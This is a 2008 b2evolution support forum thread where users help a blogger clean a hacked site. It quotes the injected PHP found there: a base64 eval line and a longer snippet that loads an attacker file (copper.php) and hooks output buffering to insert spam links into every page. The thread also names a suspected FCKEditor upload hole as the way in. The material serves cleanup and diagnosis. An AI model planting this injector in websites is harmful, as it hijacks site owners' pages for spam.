Recent Topics

1 Nov 19, 2008 19:01    

My b2evolution Version: 1.9.x

http://www.privatjokr.com/index.php?disp=comments

Any idea how that happened? Or what I need to do to make it go away? Sorry if this is an obvious fix.

2 Nov 19, 2008 22:34

You may want to upgrade to the latest b2evolution version. Also consider changing your passwords.
Well, I've no experience with b2evo v1.9.x, so I can't really help you, sorry.

3 Nov 22, 2008 05:39

Here's the code you should delete from skins/custom/_main.php

<? /**/eval(base64_decode('aWYoZTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

p.s.
It's a lot longer than in my example. And try to find the file named copper.php, use search in files/directories. Rename it or delete (do it on your own risk) when you find this file.

4 Nov 22, 2008 08:11

What version of coppermine gallery are you running?

¥

5 Nov 22, 2008 15:39

¥åßßå, it has nothing to do with coppermine gallery, it's just a file generating spam.

You may want to read this.
http://www.tinyportal.net/index.php?action=printpage;topic=26106.0
http://www.xoops.org/modules/newbb/viewtopic.php?post_id=297046

BTW, here's the full code I found in nelsonguirado's index.main.php

if( function_exists('ob_start') && !isset($GLOBALS['sh_no']) )
{
	$GLOBALS['sh_no'] = 1;
	if( file_exists('/LONG_PATH/copper.php') )
	{
		include_once('/LONG_PATH/copper.php');
		if( function_exists('gml') && !function_exists('dgobh') )
		{
			if( !function_exists('gzdecode') )
			{
				function gzdecode( $R20FD65E9C7406034FADC682F06732868 )
				{
					$R6B6E98CDE8B33087A33E4D3A497BD86B = ord( substr($R20FD65E9C7406034FADC682F06732868,3,1) );
					$R60169CD1C47B7A7A85AB44F884635E41 = 10;
					$R0D54236DA20594EC13FC81B209733931 = 0;
					
					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 4 )
					{
						$R0D54236DA20594EC13FC81B209733931 = unpack( 'v', substr($R20FD65E9C7406034FADC682F06732868,10,2) );
						$R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
						$R60169CD1C47B7A7A85AB44F884635E41 + = 2 + $R0D54236DA20594EC13FC81B209733931;
					}
					
					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 8 )
					{
						$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}
					
					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 16 )
					{
						$R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}
					
					if($R6B6E98CDE8B33087A33E4D3A497BD86B&2)
					{
						$R60169CD1C47B7A7A85AB44F884635E41+=2;
					}
					$RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
					
					if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE)
					{
						$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
					}
					return $RC4A5B5E310ED4C323E04D72AFAE39F53;
				}
			}
	
		function dgobh($RDA3E61414E50AEE968132F03D265E0CF)
		{
			Header('Content-Encoding: none');
			
			$R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
			
			if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90))
			{
				return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
			}
			else
			{
				return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
			}
		}
		ob_start('dgobh');}
	}
}

6 Nov 22, 2008 16:04

That's cool, but for the file to be edited the attacker needed a door ;)

They're both running different evo versions and they're both running coppermine, just not sure of the versions.

¥

7 Nov 22, 2008 16:08

That's the reason why privatjokr should change his passwords (and check other files/scripts for vulnerabilities).

8 Nov 22, 2008 16:14

This virus is known to enter through upload in FCKEditor (v2.3). The solution is upgrade that to 2.6.

9 Dec 11, 2008 07:26

Yabba may be on to something. Another site,I have, www.magnasquids.com, had Coppermine and it s SMF forum was hacked with the same copper thing.

My hacked blog, on another server, had a Coppermine installation in the same directory.

10 Dec 11, 2008 07:26

Yabba may be on to something. Another site,I have, www.magnasquids.com, had Coppermine and it s SMF forum was hacked with the same copper thing.

My hacked blog, on another server, had a Coppermine installation in the same directory.

By the way, I love blogging again, thanks to you guys. I hope you guys stick around for a long time.

11 Oct 05, 2011 21:46

Thanks for the reply! Interesting... Perhaps I will revisit after some sleep then... ;)


Form is loading...